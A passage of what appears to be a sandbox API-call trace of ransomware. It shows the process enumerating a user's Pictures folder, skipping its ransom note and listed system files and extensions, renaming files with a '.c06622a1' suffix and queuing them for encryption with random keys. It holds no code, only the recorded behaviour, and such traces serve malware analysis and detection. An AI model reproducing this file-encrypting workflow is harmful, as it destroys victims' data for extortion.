_Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.959] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.959] wcscpy (in: _Dest=0x4560156, _Source="Q1cepvN-j.bmp" | out: _Dest="Q1cepvN-j.bmp") returned="Q1cepvN-j.bmp" [0155.959] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp", dwFileAttributes=0x80) returned 1 [0155.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\q1cepvn-j.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0155.959] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.960] ReadFile (in: hFile=0x630, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.960] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x77e84101 [0155.960] RtlComputeCrc32 (PartialCrc=0x4101, Buffer=0x3fe3f4, Length=0x80) returned 0x979bfe22 [0155.960] RtlComputeCrc32 (PartialCrc=0xfe22, Buffer=0x3fe3f4, Length=0x80) returned 0xa871fcd4 [0155.960] RtlComputeCrc32 (PartialCrc=0xfcd4, Buffer=0x3fe3f4, Length=0x80) returned 0x7432e3b4 [0155.960] RtlComputeCrc32 (PartialCrc=0xe3b4, Buffer=0x3fe3f4, Length=0x80) returned 0xe86c7895 [0155.960] CloseHandle (hObject=0x630) returned 1 [0155.961] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0155.961] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp" [0155.961] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp") returned 0x58 [0155.961] wcscpy (in: _Dest=0x4570178, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.961] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\q1cepvn-j.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\q1cepvn-j.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Q1cepvN-j.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\q1cepvn-j.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0155.964] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.964] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4dc0020 [0155.970] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x35c6fbb0 [0155.970] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d2a7397 [0155.970] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x30bba5a1 [0155.971] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e12f0cb [0155.971] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x597bc4f7 [0155.971] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6e4ac55f [0155.971] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xdf8b17d [0155.971] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x696db05c [0155.974] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4dc0094, Length=0x80) returned 0x9afcc418 [0155.974] RtlComputeCrc32 (PartialCrc=0xc418, Buffer=0x4dc0094, Length=0x80) returned 0x21b8bd32 [0155.974] RtlComputeCrc32 (PartialCrc=0xbd32, Buffer=0x4dc0094, Length=0x80) returned 0x90ced5c5 [0155.974] RtlComputeCrc32 (PartialCrc=0xd5c5, Buffer=0x4dc0094, Length=0x80) returned 0x6405844d [0155.974] RtlComputeCrc32 (PartialCrc=0x844d, Buffer=0x4dc0094, Length=0x80) returned 0x84cc55bd [0155.974] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0155.974] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0155.974] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0155.974] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8731e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdb8731e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb8731e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.974] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.974] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1919bad0, ftCreationTime.dwHighDateTime=0x1d5e562, ftLastAccessTime.dwLowDateTime=0xca1bf570, ftLastAccessTime.dwHighDateTime=0x1d5dbd3, ftLastWriteTime.dwLowDateTime=0xca1bf570, ftLastWriteTime.dwHighDateTime=0x1d5dbd3, nFileSizeHigh=0x0, nFileSizeLow=0xe51f, dwReserved0=0x0, dwReserved1=0x0, cFileName="UeVySRw.bmp", cAlternateFileName="")) returned 1 [0155.974] _wcsicmp (_Str1="UeVySRw.bmp", _Str2="README.c06622a1.TXT") returned 3 [0155.974] wcsstr (_Str="UeVySRw.bmp", _SubStr="README") returned 0x0 [0155.974] _wcsicmp (_Str1="autorun.inf", _Str2="UeVySRw.bmp") returned -20 [0155.974] wcslen (_String="autorun.inf") returned 0xb [0155.974] _wcsicmp (_Str1="boot.ini", _Str2="UeVySRw.bmp") returned -19 [0155.974] wcslen (_String="boot.ini") returned 0x8 [0155.974] _wcsicmp (_Str1="bootfont.bin", _Str2="UeVySRw.bmp") returned -19 [0155.974] wcslen (_String="bootfont.bin") returned 0xc [0155.975] _wcsicmp (_Str1="bootsect.bak", _Str2="UeVySRw.bmp") returned -19 [0155.975] wcslen (_String="bootsect.bak") returned 0xc [0155.975] _wcsicmp (_Str1="desktop.ini", _Str2="UeVySRw.bmp") returned -17 [0155.975] wcslen (_String="desktop.ini") returned 0xb [0155.975] _wcsicmp (_Str1="iconcache.db", _Str2="UeVySRw.bmp") returned -12 [0155.975] wcslen (_String="iconcache.db") returned 0xc [0155.975] _wcsicmp (_Str1="ntldr", _Str2="UeVySRw.bmp") returned -7 [0155.975] wcslen (_String="ntldr") returned 0x5 [0155.975] _wcsicmp (_Str1="ntuser.dat", _Str2="UeVySRw.bmp") returned -7 [0155.975] wcslen (_String="ntuser.dat") returned 0xa [0155.975] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UeVySRw.bmp") returned -7 [0155.975] wcslen (_String="ntuser.dat.log") returned 0xe [0155.975] _wcsicmp (_Str1="ntuser.ini", _Str2="UeVySRw.bmp") returned -7 [0155.975] wcslen (_String="ntuser.ini") returned 0xa [0155.975] _wcsicmp (_Str1="thumbs.db", _Str2="UeVySRw.bmp") returned -1 [0155.975] wcslen (_String="thumbs.db") returned 0x9 [0155.975] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.975] wcslen (_String="386") returned 0x3 [0155.975] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.975] wcslen (_String="adv") returned 0x3 [0155.975] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.975] wcslen (_String="ani") returned 0x3 [0155.975] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.975] wcslen (_String="bat") returned 0x3 [0155.975] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.975] wcslen (_String="bin") returned 0x3 [0155.975] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.975] wcslen (_String="cab") returned 0x3 [0155.975] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.975] wcslen (_String="cmd") returned 0x3 [0155.975] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.976] wcslen (_String="com") returned 0x3 [0155.976] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.976] wcslen (_String="cpl") returned 0x3 [0155.976] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.976] wcslen (_String="cur") returned 0x3 [0155.976] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.976] wcslen (_String="deskthemepack") returned 0xd [0155.976] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.976] wcslen (_String="diagcab") returned 0x7 [0155.976] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.976] wcslen (_String="diagcfg") returned 0x7 [0155.976] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.976] wcslen (_String="diagpkg") returned 0x7 [0155.976] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.976] wcslen (_String="dll") returned 0x3 [0155.976] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.976] wcslen (_String="drv") returned 0x3 [0155.976] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.976] wcslen (_String="exe") returned 0x3 [0155.976] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.976] wcslen (_String="hlp") returned 0x3 [0155.976] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.976] wcslen (_String="icl") returned 0x3 [0155.976] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.976] wcslen (_String="icns") returned 0x4 [0155.976] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.976] wcslen (_String="ico") returned 0x3 [0155.976] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.976] wcslen (_String="ics") returned 0x3 [0155.976] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.976] wcslen (_String="idx") returned 0x3 [0155.977] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.977] wcslen (_String="ldf") returned 0x3 [0155.977] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.977] wcslen (_String="lnk") returned 0x3 [0155.977] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.977] wcslen (_String="mod") returned 0x3 [0155.977] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.977] wcslen (_String="mpa") returned 0x3 [0155.977] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.977] wcslen (_String="msc") returned 0x3 [0155.977] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.977] wcslen (_String="msp") returned 0x3 [0155.977] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.977] wcslen (_String="msstyles") returned 0x8 [0155.977] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.977] wcslen (_String="msu") returned 0x3 [0155.977] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.977] wcslen (_String="nls") returned 0x3 [0155.977] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.977] wcslen (_String="nomedia") returned 0x7 [0155.977] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.977] wcslen (_String="ocx") returned 0x3 [0155.977] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.977] wcslen (_String="prf") returned 0x3 [0155.977] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.977] wcslen (_String="ps1") returned 0x3 [0155.977] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.977] wcslen (_String="rom") returned 0x3 [0155.977] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.977] wcslen (_String="rtp") returned 0x3 [0155.977] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.978] wcslen (_String="scr") returned 0x3 [0155.978] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.978] wcslen (_String="shs") returned 0x3 [0155.978] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.978] wcslen (_String="spl") returned 0x3 [0155.978] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.978] wcslen (_String="sys") returned 0x3 [0155.978] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.978] wcslen (_String="theme") returned 0x5 [0155.978] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.978] wcslen (_String="themepack") returned 0x9 [0155.978] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.978] wcslen (_String="wpx") returned 0x3 [0155.978] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.978] wcslen (_String="lock") returned 0x4 [0155.978] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.978] wcslen (_String="key") returned 0x3 [0155.978] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.978] wcslen (_String="hta") returned 0x3 [0155.978] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.978] wcslen (_String="msi") returned 0x3 [0155.978] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.978] wcslen (_String="pdb") returned 0x3 [0155.978] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.978] wcslen (_String="sql") returned 0x3 [0155.978] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.978] wcslen (_String="sqlite") returned 0x6 [0155.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.978] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.979] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.979] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.979] wcscpy (in: _Dest=0x4560156, _Source="UeVySRw.bmp" | out: _Dest="UeVySRw.bmp") returned="UeVySRw.bmp" [0155.979] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp", dwFileAttributes=0x80) returned 1 [0155.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uevysrw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0155.998] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.998] ReadFile (in: hFile=0x1c, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.999] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x20ee9dd3 [0155.999] RtlComputeCrc32 (PartialCrc=0x9dd3, Buffer=0x3fe3f4, Length=0x80) returned 0xb211e077 [0156.000] RtlComputeCrc32 (PartialCrc=0xe077, Buffer=0x3fe3f4, Length=0x80) returned 0x3d652f81 [0156.000] RtlComputeCrc32 (PartialCrc=0x2f81, Buffer=0x3fe3f4, Length=0x80) returned 0x983fbc7f [0156.000] RtlComputeCrc32 (PartialCrc=0xbc7f, Buffer=0x3fe3f4, Length=0x80) returned 0xdf7d2284 [0156.000] CloseHandle (hObject=0x1c) returned 1 [0156.000] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.000] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp" [0156.000] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp") returned 0x56 [0156.000] wcscpy (in: _Dest=0x4570174, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.000] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uevysrw.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uevysrw.bmp.c06622a1"), dwFlags=0x8) returned 1 [0156.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UeVySRw.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uevysrw.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0156.008] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.009] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4e50020 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x20c2cf0a [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d82c098 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x487019a5 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf03bc09 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39418150 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6bd391c0 [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2cce750b [0156.017] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6e98ce22 [0156.020] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4e50094, Length=0x80) returned 0xce6a372d [0156.020] RtlComputeCrc32 (PartialCrc=0x372d, Buffer=0x4e50094, Length=0x80) returned 0x3a6ad223 [0156.021] RtlComputeCrc32 (PartialCrc=0xd223, Buffer=0x4e50094, Length=0x80) returned 0x73d63ac [0156.021] RtlComputeCrc32 (PartialCrc=0x63ac, Buffer=0x4e50094, Length=0x80) returned 0x57009d44 [0156.021] RtlComputeCrc32 (PartialCrc=0x9d44, Buffer=0x4e50094, Length=0x80) returned 0x3f5d6779 [0156.021] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0156.021] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.021] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.021] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8f5ab0, ftCreationTime.dwHighDateTime=0x1d5ddb7, ftLastAccessTime.dwLowDateTime=0x2a5dd730, ftLastAccessTime.dwHighDateTime=0x1d5e513, ftLastWriteTime.dwLowDateTime=0x2a5dd730, ftLastWriteTime.dwHighDateTime=0x1d5e513, nFileSizeHigh=0x0, nFileSizeLow=0x7f3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Utng.bmp", cAlternateFileName="")) returned 1 [0156.021] _wcsicmp (_Str1="Utng.bmp", _Str2="README.c06622a1.TXT") returned 3 [0156.021] wcsstr (_Str="Utng.bmp", _SubStr="README") returned 0x0 [0156.021] _wcsicmp (_Str1="autorun.inf", _Str2="Utng.bmp") returned -20 [0156.021] wcslen (_String="autorun.inf") returned 0xb [0156.021] _wcsicmp (_Str1="boot.ini", _Str2="Utng.bmp") returned -19 [0156.021] wcslen (_String="boot.ini") returned 0x8 [0156.021] _wcsicmp (_Str1="bootfont.bin", _Str2="Utng.bmp") returned -19 [0156.021] wcslen (_String="bootfont.bin") returned 0xc [0156.021] _wcsicmp (_Str1="bootsect.bak", _Str2="Utng.bmp") returned -19 [0156.021] wcslen (_String="bootsect.bak") returned 0xc [0156.021] _wcsicmp (_Str1="desktop.ini", _Str2="Utng.bmp") returned -17 [0156.021] wcslen (_String="desktop.ini") returned 0xb [0156.021] _wcsicmp (_Str1="iconcache.db", _Str2="Utng.bmp") returned -12 [0156.022] wcslen (_String="iconcache.db") returned 0xc [0156.022] _wcsicmp (_Str1="ntldr", _Str2="Utng.bmp") returned -7 [0156.022] wcslen (_String="ntldr") returned 0x5 [0156.022] _wcsicmp (_Str1="ntuser.dat", _Str2="Utng.bmp") returned -7 [0156.022] wcslen (_String="ntuser.dat") returned 0xa [0156.022] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Utng.bmp") returned -7 [0156.022] wcslen (_String="ntuser.dat.log") returned 0xe [0156.022] _wcsicmp (_Str1="ntuser.ini", _Str2="Utng.bmp") returned -7 [0156.022] wcslen (_String="ntuser.ini") returned 0xa [0156.022] _wcsicmp (_Str1="thumbs.db", _Str2="Utng.bmp") returned -1 [0156.022] wcslen (_String="thumbs.db") returned 0x9 [0156.022] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0156.022] wcslen (_String="386") returned 0x3 [0156.022] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0156.022] wcslen (_String="adv") returned 0x3 [0156.022] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0156.022] wcslen (_String="ani") returned 0x3 [0156.022] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0156.022] wcslen (_String="bat") returned 0x3 [0156.022] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0156.022] wcslen (_String="bin") returned 0x3 [0156.022] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0156.023] wcslen (_String="cab") returned 0x3 [0156.023] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0156.023] wcslen (_String="cmd") returned 0x3 [0156.023] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0156.023] wcslen (_String="com") returned 0x3 [0156.023] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0156.023] wcslen (_String="cpl") returned 0x3 [0156.023] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0156.023] wcslen (_String="cur") returned 0x3 [0156.023] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0156.023] wcslen (_String="deskthemepack") returned 0xd [0156.023] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0156.023] wcslen (_String="diagcab") returned 0x7 [0156.023] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0156.023] wcslen (_String="diagcfg") returned 0x7 [0156.023] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0156.023] wcslen (_String="diagpkg") returned 0x7 [0156.023] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0156.023] wcslen (_String="dll") returned 0x3 [0156.023] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0156.023] wcslen (_String="drv") returned 0x3 [0156.023] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0156.024] wcslen (_String="exe") returned 0x3 [0156.024] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0156.024] wcslen (_String="hlp") returned 0x3 [0156.024] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0156.024] wcslen (_String="icl") returned 0x3 [0156.024] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0156.024] wcslen (_String="icns") returned 0x4 [0156.024] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0156.024] wcslen (_String="ico") returned 0x3 [0156.024] 